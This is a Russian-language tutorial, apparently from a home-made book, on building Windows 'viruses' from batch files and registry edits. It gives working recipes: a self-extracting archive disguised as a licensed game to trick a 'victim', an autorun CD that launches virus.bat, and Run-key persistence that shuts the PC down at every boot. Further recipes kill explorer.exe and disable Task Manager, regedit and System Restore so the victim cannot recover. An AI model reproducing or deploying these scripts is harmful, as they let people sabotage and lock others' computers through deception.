На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «Режим перезаписи» ставим пометку «Перезаписывать без подтверждения».
На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Сейчас работает мастер установки игры «pirate». Это длительный процесс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!
На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуралесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загрузить привычный значок "WORD(а)" или картинки, то жертва без малейших подозрений с радостью запустит... хм... вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!

Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:

Chcp 1251
cd "%USERPROFILE%\Главное меню\Программы\Автозагрузка"
attrib +h

вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было. Лучше конечно пользоваться реестровой автозагрузкой, но это в других главах...






CD с вирусом.
А вот например если мы хотим «подарить» ваш великолепно выполненный вирус определённому человеку, да ещё вдобавок не по сети, а дать его на диске, то можно ещё кое как фишкануть… кстати говоря чтобы жертва на вас не злилась можно на диске действительно записать какую-нибудь небольшую игру, возможно он успеет поиграть в неё, и как не в чём не бывало отключить комп... Но он его больше не включит. У вас есть прикрытие вы скажете мол установка игрухи прошла криво.
Описание ближайшего будущего:
Наша жертва берёт наш диск и засовывает его в дисковод и как обычно ждёт когда комп прочтёт диск и запустит его, а тем временем наш диск ка-а-а-ак запустит автоматически наш вирус и всё удалит…ну или создаст много мусора… вот такая хрень…
Для этого мы откроем блокнот и напишем там следующие:

[autorun]
OPEN=virus.bat

Имя, которое у меня стоит «virus» может быль любое, например «1». Вспомните когда мы вставляем диск с какоё-либо игрой то после открытия «Моего компа» на том месте, где был обычный значок диска, появляется значок игры…вот и мы можем также сделать засунуть значок, на диск, обозвав его «znak» и добавляем в нашем файле строку:

ICON=znak.ico

Потом сохраняем наш файл, дав ему имя AUTORUN и расширение .inf
Для особо тупых:

[autorun]
OPEN=virus.bat
ICON=znak.ico

Всё это будет сохранено AUTORUN.inf

Должен появиться такой файл:

Потом берём и записываем на диск наши четыре компонента:

virus.bat наш с вами «мощненький вирусик»
znak.ico какой нибуть красивый значёк
AUTORUN.inf автомат запуска вируса
Игра... можете и не записывать.

Вирус, тут желательно делать такой который создаёт много мусора типа это игра столько занимает, которую вы предварительно запишите на диск. И ещё в коде надо прописать запуск установки игры, чтобы пи включении диска у нас запустилась установка и вирус. Правда после её удаления место существенно не прибавиться и только мы знаем почему. Преимущество такого вот способа состоит в том, что длительный процесс создания мусора можно сослать непосредственно на распаковку игры.





Итак, ненавижу теорию, но ща быстренько ознакомлю тех, кто не разу не лазил в реестре те, кто лазил, могут не читать, ничего нового я не скажу…
Итак, заходим по адресу: С:\WINDOWS и открываем regedit

Тут же открывается окошко, которое поделено на две части в левой части мы видим:

HKEY_CLASSES_ROOT
(сокр. HKCR) Здесь сведения обеспечивают запуск необходимой программы при открытии файла с помощью проводника. Этот раздел содержит связи между приложениями и типами файлов
HKEY_CURRENT_USER
(сокр. HKCU) Тут находяться настройки для текущего пользователя (т.е. для нас)
HKEY_LOCAL_MACHINE
(сокр. HKLM) Настройки, относящиеся к вашему компу и пременимы для всех пользователей. Раздел содержит информацию об аппаратной конфигурации и установленном программном обеспечении.
HKEY_USERS
(сокр. HKU) Тут настройки для всех пользователей компа.
HKEY_CURRENT_CONFIG
(сокр. HKCC) Тут вся информация о текущей конфигурации

Каждый из этих разделов разбивается на множество подразделов, которые имеют свои параметры. Мы виим разные значки Все разделы и подразделы в левом окне, а параметры к ним в правом. Нажмите правой кнопкой мыши по правому окну вылетит строки создать, так что же мы можем создать:

REG_BINARY
(Двоичный параметр) Двоичные данные. Большинство сведений об аппаратных компонентах хранится в виде двоичных данных и выводится в редакторе реестра в шестнадцатеричном формате.
REG_DWORD
(параметр DWORD) Целые числа размером в 4 байта. Многие параметры служб и драйверов устройств имеют этот тип и отображаются в двоичном, шестнадцатеричном или десятичном форматах.
REG_EXPAND_SZ
(Расширяемый строковый параметр) Строка данных переменной длины.
REG_SZ
(Строковый параметр) Текстовая строка фиксированной длины.
REG_MULTI_SZ
(Мультистроковый параметр) Многострочный текст. Этот тип, как правило, имеют списки и другие записи в формате, удобном для чтения. Записи разделяются пробелами, запятыми или другими символами.

Вот погуляйте по реестру, нажимая плюсики и, меняя подразделы, и вы увидите, как их тут много, но изменения будут происходить в основном с параметрами, мы то добавим, что- нибудь, то удалим, или изменим. Сейчас я вам расскажу как экспортировать подраздел, чтобы не объяснять этого во время наших махинаций. Мы сейчас просто скопируем подраздел .lnk со всеми параметрами, например в «Мои документы» ну например для того если мы с вами нечаянно запустили наш вирус по уничтожению расширений, то можно взять и вернуть всё на место просто щелкнуть два раза по нашей копии в «Моих документах».

Ну что открываем HKEY_CLASSES_ROOT и ищем .lnk если мы ещё плохо ориентируемся, то нажимаем «Правка» выбираем строку «Найти» пишем .lnk и нажимаем кнопку «Найти далее» система может чуть потупить, а потом покажет наш раздел. А мы нажимаем на него правой кнопкой, вылетает контекстное меню, выбираем «Экспортировать» и пишем имя нашего ключа (например: «расширение ярлыка») и жмём кнопку «Сохранить». И теперь если ни один ярлык не будет работать, есть шанс, что мы всё восстановим с помощью нашей заранее заготовленной копии.

Чтобы создать какой-нибудь ключ самому достаточно нажать правой кнопкой мыши в правом поле выбрать «Создать», а потом выбрать какой именно параметр мы хотим создать: «Двоичный» или «Мультистроковый» и д.р.
Чтобы удалить, жмём на параметр правой кнопкой и выбираем «Удалить» (прежде чем удалять создайте копию раздела, где будет удалён ключ)





Кнопка Пуск
И сразу оговорка чтобы не было недоразумений. Все вирусы связанные с реестром я проверял только на XP даже не знаю будут ли они работать на 98/95 виндах.
--------------------------------------------------------------------------------

Скоросное меню

Нажали кнопку «Пуск» или «Start» навели, предположим, к строчке «Программы» а это строчка собака медлит и не вылетает можно ускорить этот процесс. Заходим по адресу:

HKEY_CURRENT_USER/Control Panel/Desktop
и ищем во всех ключах Desktop(а) ключ MenuShowDelay нажимаем на него два раза и в поле «Значение» (где по умолчанию стоит 400) пишем 0, подтверждаем ОК и всё после перезагрузки у вас будет метеор, а не контекстное меню. Ну это мы для себя старались, а вот для врага пишем в значении 9999999 и тогда он не дождётся долбаного меню.

Восстановление системы

Чтобы враг не восстановился после наших махинаций, мы удалим пункт "Восстановление системы"
Заходим по адресу:
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore
Создаём (DWORD) ключ DisableSR и присваиваем ему значение 1.

--------------------------------------------------------------------------------
Все нижеперечисленые ключи необходимо создавать в разделе:
HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\Explorer
--------------------------------------------------------------------------------

Очистка

Нажали «Пуск» нажали «Выполнить» а там столько всего команд ого-го как же сделать, чтобы всё было чисто? И ещё чтобы не чего не сохранялось в «недавних документах».

Cоздаём «Двоичный параметр» даём ему имя ClearRecentDocsOnExit и пишем к нему значение 01 00 00 00. всё при включение комп будет очищать всё это.

Удалить недавние документы

Создаём там же (DWORD) ключ NoRecentDocsMenu и задаём ему значение 1.

Удаление строки"Выполнить"

Создаём (DWORD) ключ NoRun и задаём значение 1.

Удалить кнопку "Завершение работы"

Создаём (DWORD) ключ NoClose и задаём значение 1.

Удалить кнопку "Выход из системы"

Создаём (DWORD) ключ StartmenuLogoff и задаём значение 1.

Удаляем пункт "Найти"

Создаём (DWORD) ключ NoFind и задаём значение 1.

Удаление "Панель управления"

Создаём (DWORD) ключ NoSetFolders и задаём значение 1.

Чтобы небыло «Свойств» кнопки «Пуск»

Создаём (DWORD) ключ NoSetTaskbar и задаём значение 1.

Удаление пункта "Мои документы"(в XP пуске)

Создаём (DWORD) ключ NoRecentDocsMenu и задаём значение 1.

Удаление пункта "Справка"

Создаём (DWORD) ключ NoSMHelp и задаём значение 1.

--------------------------------------------------------------------------------
Чтобы вернуть удалённое просто поставьте значение за место единицы "1" ноль "0".










Рабочий стол
Версия компа (как в безопасном режиме)

Чтобы в правом нижнем углу была показана версия вашего компа заходи:

HKEY_CURRENT_USER\Control Panel\Desktop
Находим там ключ PaintDesktopVersion и меняем его значение с 0 на 1.

Удаление тупой приставки

Вот вы когда создаёте ярлык, к какому либо документу всегда система приписывает слово «Ярлык» в начале названия это меня бесит хорошо, что можно этого избежать:

HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
Находим тут ключ link и изменяем его значение с 11 00 00 00 на 00 00 00 00.

Полезно для вируса, запуск при загрузки

Чтобы программы автоматически запускались при входе в систему:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Добавляем «Строковый параметр» (с любым именем) и в значении указываем полный путь к программе (Например: C:\Program Files\Download Master\dmaster.exe).

Корзины то НЭМА!

Можно убрать корзину с рабочего стола:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
и когда мы открыли NameSpace мы видм несколько разделов со странными именами так вот берём и удаляем один из них его имя:
{645FF040-5081-101B-9F08-00AA002F954E}, и корзина пропадет со стола.

Скрыть "Мои документы"

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
и создаём параметр (DWORD) {450D8FBA-AD25-11D0-98A8-0800361B1103} со значением 1.

Удалим обои с рабочего стола

Можно удалить картинку с рабочего стола, он станет синим.

HKEY_CURRENT_USER\Control Panel\Desktop
и удаляем там параметр Wallpaper и картинка исчезает... А ещё можно в свойствах этого параметра прописать полный путь к любой картинке и она станет обоями.

Скрытие всех значков с рабочего стола! (страшно)

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
и создадим тут ключ (DWORD) NoDesktop со значением 1.

Запрет контекстного меню

Чтобы сделать недоступным контекстное меню при щелчке правой кнопкой мыши по рабочему столу или папке найдите ветвь:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
создайте параметр типа (DWORD) NoViewContextMenu со значением 1.

Часы

Можно написать своё слова заместо часов в правом -нижнем углу экрана
HKCU\Control Panel\International
создаем строковый параметр sTimeFormat а в свойствах пишем слово (не более 8 символов)

Значки рабочего стола

Все значки на рабочем столе имеют одинаковый размер по умолчанию это "35" а если поставить 500 или 900? Дааа хана, только одна папка "Мои документы" будет занимать почти всю область экрана... А к примеру если написать в значении "0" то само собой значков не будет видно совсем... только их названия.
[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics] ищем тут параметр Shell Icon Sizeи меняем его значение на 900 или 0.

Контекстное меню и строка заголовка

HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics
находим там параметр MenuHeight и меняем его значение на 500 или больше... И когда вы откроете контекстное меню вы ох….те, оно будет очень здоровое. То же касается и некоторых программ, например "Блокнота" вот откройте блокнот с измененными параметрами это страшно. В этой же директории находим параметр:
CaptionHeight и меняем его значение так же на 500 или как хотите и теперь в любой программе вот эта синенькая полоска на самом верху, ну где справа стоит «Закрыть», «Свернуть», «Развернуть» превратиться в нечто ужасное, например, «Закрыть» такой красный квадратик с крестиком будет почти не пол экрана! (Неудобно....)





Разности
Меняем автозагрузку

Вот что я задумал, всем вам известно, что существует такая папка "Автозагрузка" Вы туда закидываете нужные вам ярлыки программ, и они при входе в систему запускаться. А если в этой папке нам положить ну эдак так папок 50 и различных файлов штук 300!!! Я об открытии пустых папок рассказывал в "Маленькие команды" мы их сами создавали, если помните, а тут я вам предлагаю поменять местоположение папки "Автозагрузка" на другую (соответственно на ту где куча файлов и папок) итак залетай по адресу:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

ищем там ключик:

Common Startup

Заходим в его свойства там у вас должно стоять:

%ALLUSERSPROFILE%\Главное меню\Программы\Автозагрузка

А мы с вами ставим путь к папке system32 (я думаю в этой папке больше всего всяких файлов.) Если вам по душе другие то пожалуйста. А вот я пишу:

C:\WINDOWS\system32

Вы только представите, что будет, когда при загрузке все файлы начнут открываться....
Можно зайти и вот куда:

[HKEY_USERS\S-1-5-21-1957994488-57989841-725345543-1003\Software\ Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]

Здесь мы найдём такие ключи как:

Desktop
Startup
Programs
Personal
Administrative Tools

И.т.д. все перечислять я устану, но и т так понятно, что здесь прописаны пути к "Моим документам" (Personal) "Рабочему столу" (Desktop) "Программам" это раздел в меню пуск (Programs). Так вот вы уже догадались, наверное, что мы точно так же пишем во всех свойствах этих ключей путь, к каким либо папкам. Может быть, вы сделаете так чтобы ваш вирус создал, пустую папку, а потом присвоил пути рабочего стола моих документов к этой вашей пустой папки. Это будет красиво, но лучше когда очень много файлов (система тупит)
Ну и потом мы этот ключ экспортируем иии... прочитаете в следующей главе как заставить врага слить этот ключ с его бедолагой реестром.

Удаление "Общих документов"

Чтобы убрать папку «Общие документы» из «Мой компьютер»

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\MyComputer\NameSpace\DelegateFolders

и удалить там раздел:
{59031a47-3f72-44a7-89c5-5595fe6b30ee}

Прощай "Диспетчер"

Можно отключить «Диспетчера задач» для врага "приятная" новость:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

создадим (DWORD) ключ DisableTaskMgr и присвоим значение 1.

Прощай REGEDIT

Можно запретить использования REGEDIT.EXE (реестр), чтобы враг не исправил наших махинаций (ну просто необходимая команда в нашем деле...)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

создадим (DWORD) ключ DisableRegistryTools и присвоим значение 1.

Свой рисунок при загрузки

Прежде чем комп загрузиться вы видите табло «Приветствие» так вот его можно поменять на свой рисунок:

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

Находим или создаём (строковый) Wallpape параметр, а в его значении пишем полный путь к нашему рисунку. Например:
С:\yrod.bmp
И теперь при входе в комп я созерцаю нарисованного мною в Paint(е) уродца!

Картинка на панели инструментов

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]

И создаём тут «Строковый» ключ BackBitmap в его значении так же пишем полный путь к рисунку. Например:
С:\zelen_fon.bmp

Я например в одном своём вирусе делал так что при его распаковки у жертвы появляется тут напись "Чайник", (забавно...)





А ну открой папку.

[HKEY_CURRENT_USER\Control Panel\Mouse]

находим ключ DoubleClickSpeed и меняем значение на 100 ил 50.
Это какая скорость нужна для нажатия двойного щелчка по объекту (папке, файлу) в данном случае 500 миллисекунд, и если поменять значение 500 на например 100 или 50 то хер наша жертва сможет открыть что либо. Придётся работать с клавиатурой. Вот попробуйте за 100 миллисекунд нажать два раза кнопкой!

Тормоз или метиор?

[HKEY_CURRENT_USER\Control Panel\Mouse]

ищем ключ MouseSensitivity и меняем значение 2-16.
Это скорость передвижения курсора у меня стоит 10 у кого-нибудь, может 12, но мы поменяем значение на 2 и тогда курсор будет просто ужасно тормозить, не реагируя на дёргание мышкой. Можно поставить 16 и мышь будет летать как ракета (не очень то удобно).

След за мышкой

[HKEY_CURRENT_USER\Control Panel\Mouse]

ищем ключ MouseTrails и ставим 1-6
Это след от мыши можно поставить значение 6 и тогда когда курсор будет ехать то за ним будет отображаться его след. Больше число, длиннее след.

Автоматизация команд

Допустим нам надо отключить «Реестр» (ну мало ли не хотите чтобы ваш брат химичил в реестре, вы ему говорите Нельзя!!! Опасно!!! А он придурок лезит и вечно всё портит, а ты потом за ним целую ночь исправляй ошибки... Извените отвлёкся...) но неохото пол часа рыться в этом долбанном реестре и менять там разные значения. Можно всё автоматизировать пишим команды которые я покажу ниже в блокноте и сохрняете с расширением .reg или экспортируете определённый ключ и удаляете лишнее в общем сами разберётесь.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

Чтобы сново разрешить его использование:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

И стоить слить такой ключик с реестром «Реестр» отключиться (ну или влючиться). Таким же методом можно и автоатизировать многие другие команды. Только посторожнее нахер с этим запретом, а то запретите, а исправить уже не сможете. Это может либо другая программа для работы с реестром (благо она у меня есть, а то когда проверял эту команду ключик отката забыл, полез а мне дулю. Это мол Администратор вам запретил. Так что сделайте сначала ключик откатика второй на нашем рисуночке.






Совместное использование
Возможно ли совместное использование реестра и .bat файлов? Да гордо отвечу я если их использовать совместно, то таких гор можно наворотить, что не разгрести.
Как экспортировать ключи вы знаете, мало того вы знаете какие ключи,… например чтобы запретить «Диспетчера задач» или заставить мышку ползать как черепаха. В первой версии этой книги я допустил неточность применения этой команды, но зато щас всё исправлю. Нашёл я эту команду, вы не поверите в FAR(е) ну что ж это ещё раз говорит что полезные и мощные программы помогают нам бодяжить вирусы ну довольно слов приступим. Итак допустим мы экспортировали ключ:

HKLM\SOFTWARE\ Microsoft\Windows NT\CurrentVersion\Winlogon (разуметься уже с изменёнными параметрами ShutdownWithoutLogon где значение равно 0.). если вы помните это означает что мы хотим убрать в меню «Пуск» команду «Выключить» (пусть ламер помучается пытаясь отключить свой комп). Так вот скопировали мы этот раздел и назвали его 000 (три нуля) теперь создаём новый командный файл .bat и пишем там такую команду:

start/wait regedit -s 000.reg

Всё!!! Мы видим, что мы запускаем наш ключ 000.reg «start» ну и «сливаем» его с реестром при чём говорим, что хотим обязательно дождаться конца этой операции, и преступит к другой «wait» (это сейчас необязательно ведь ключ у нас один, а вот когда мы набодяжим несколько, то стоит его и применить). А ещё мы говорим, чтобы система там нечего не запрашивала и делала всё тихо спокойно, чтобы не кто не догадался «–s»
Ну и в конце всё это дело архивируем WinRAR(ом) я думаю иначе никак, не будем же мы отсылать вирусы в папках вместе с каким-то .bat да и ещё с .reg он тут же заподозрит неладное. А так, пожалуйста, заархивировал, приказал ему после распаковки выполнить наш .bat тот в свою очередь «сливает» ключ с реестром, и вирус уже в компе. Можно ещё в конце добавить команду удаления всех своих файлов, чтобы он, если более или менее шарит в компах не смог догадаться, куда ты отправил ключ, так мы сожжем все мосты.
А как писать эту команду я уже говорил, тем более вы знаете названия файлов, которые необходимо стереть (ведь вы же их сами и написали).




Отключение 2
Итак, если помните, я говорил что есть команда, которая при запуске вырубает комп, о ней я рассказывал в главе «Отключение» . И ещё в главе «Красивая оболочка» я описывал, как можно сделать, чтобы компьютер при повторном включении отключался снова. Но есть там недостаток, любой может при включении компа, держать нажатой клаву Shift и всё, автозагрузку он обошёл и наш хитро-тупорылый вирус не сработал. Сейчас я опешу ещё один такой пример. Почему только сейчас, а не в той главе? Да потому что этот пример будет содержать работу с реестром. А мы тоько-только начали с ним работать. Итак, приступим.
Давайте сразу условимся, что при распаковке нашего вируса из архива WinRAR он будет распакован в директорию C:\Program Files\virus. Теперь напишем команду отключения компа через 0 секунд и сохраним её 0.bat Теперь заходим по адресу в реестре:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

И создаём там «Сроковый параметр» и дадим ему название «virus». А в его значении напишем путь к нашему 0.bat файлу как вы помните, я сказал, куда его распаковывать итак в значении пишем:

C:\Program Files\virus\0.bat"

Всё, экспортируем этот ключ, ну допустим в «Мои документы», например 0.reg, а дальше всё делаем как в главе «Совместное использование». Осталось написать .bat файл, где будет прописано, как распаковывать без подтверждения наш .reg файл и обзавём его 1.bat И что-же у нас получилось?

--------------------------------------------------------------------------------

0.bat
Shutdown -t 0 -s

1.bat
start/wait regedit -s 0.reg
cd %ProgramFiles%
attrib +h +s virus

0.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"virus"="C:\\Program Files\\virus\\0.bat"

WINRAR запускает 1.bat который запускает
0.reg который сливается с реестром и говорит компу чтобы он при загрузке запускал 0.bat в котором прописана команда отключения компа. Всё просто.

--------------------------------------------------------------------------------

Блокировка
Всё что будет написано ниже не относиться к отключению, а к блокировке компа. И я подумал это практически одно и то же чё по двести глав писать и поэтому покажу, как заблокировать комп в этой главе.
Я применял разные способы блокировки, даже самые немыслимые, но вам я расскажу самый простой способ. Тем более он похож на предыдущую команду.
Итак, при установке вируса WinRAR автоматически записывает все три файла: 0.bat 1.bat и 0.reg в C:\Program Files\blok, а потом автоматически загружает файл 1.bat (надеюсь, вы уяснили, как это делать с помощью WinRAR. Если нет, читайте главу "Красивая оболочка"

1.bat
start/wait regedit -s 0.reg
cd %ProgramFiles%
attrib +h +s blok
Shutdown -t 0 –s

Здесь мы видим, что ключ 0.reg сливается с реестром. Затем переходим в Program Files и ставим атрибуты "Скрытый" и "Системный" на созданную нами папку blok (чтобы её не обнаружили, это так, предосторожность). Потом мы просто отключаем комп, чтобы параметры вступили в силу.

0.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Microssoft"="C:\\Program Files\\blok\\0.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000001

Здесь показан ключ, который сливается с реестром файлом 1.bat. Что мы видим? Мы приказываем компу при включении запускать файл 0.bat. И ещё есть две команды, ниже запрещающие использование "Диспетчера задач" и "Реестра" (чтобы жертва не стёрла этот ключ)







0.bat
taskkill /im explorer.exe /f /t

Это файл, который запускается при загрузке компа. В нём мы видим команду, которая снимает процесс explorer без него не видать вам ни рабочего стола, ни даже курсора мышки. Вы скажете этот процесс можно опять легко запустить с помощью "Диспетчера задач" ан нет, мы же его запретили (всё блин предусмотрено).

--------------------------------------------------------------------------------

Обойти это проще простого, если вдруг вы нечаянно запустили вирус у себя, или просто решили испытать его, вру ли я или нет… Запускаем комп в безопасном режиме, просто при самом включении компа держите нажатой клаву F8, вылетит 9 или сколько там надписей мы выбираем строку «Безопасный режим» и жмём Enter и спокойно включаем наш комп, затем уже ежу понятно или заходим в реестр и стираем там строку, ведущую к запуску нашего вируса. Или просто удаляем папку, где вирус сидит. Хотя лучше сделать и то и то сразу (чё мусором забивать комп.)




Слияние с реестром 2

В главе совмещение я описывал как добавлять в реестр ключи. Но для этого приходилось сначало копировать этот ключ, там исправлять. А можно добавить информацию в реестр без дополнительных файлов, непосредственно написав команду? Да можно, почему же я написал две главы? Возможно кому то эта покажется сложной, а кому то наоборот так будет милее и приятние...

reg add "HKLM\Software\Microsoft\Internet Explorer\Toolbar" /v BackBitmap /t REG_SZ /d C:\zelon_fon.bmp /f

--------------------------------------------------------------------------------
Возможно у вас разрешение экрана маленькое и вы видите 2 строки в команде, но надо написать все данные в одну строчку!!!
--------------------------------------------------------------------------------

Итак Мы видим какие то параметры, буквы что всё это? Для начала вам в двойных кавычках надо указать путь в реестре где наш параметр будет создан. В начале используется сокращения, если затрудняетесь в главе "Знакомство" я про сокращения писал. После ключа /v нам надо написать название нашего параметра. После ключа /t надо написать тип данных в котором будет сохранён наш параметр. Как узнать какое сокращение, читай в главе "Знакомство". После ключа /d надо написать что будет указано в значение нашего параметра. Ну и ключ /f не показывает нам ни каких предупреждений.

А чё хоть делает то эта запись в реестре? Она ставит картинку на панель инструментов. Картинка есть в главе "Разности". Давайте для закрепления ещё покажу команду которая отключает "Диспетчера задач":

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

Я специально взял такой вариант, тут всё разное, тип данных, значение, путь. Надеюсь вы поняли как и что надо писать.
А если подумать, всё просто, вот только вам надо знать все необходимые данные. Название ключа, где он расположен, тип данных. Благо я за вас постарался и написал всё это в главах: "Кнопка Пуск", "Рабочий стол" и "Разности".

Так же легко можно записи в реестре удалять, пожалуй даже легче (ломать не строить). Я покажу как стереть наш параметр который запрещает запуск "Диспетчера задач":

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /f
параметром /v. Ну и всё сделаем тихо /f.
Мы видим что в начале у нас заменён параметр add (добавить) на параметр delete (удалить). Нам надо указать где наш ключ лежит (задать путь) и указать его имя тем же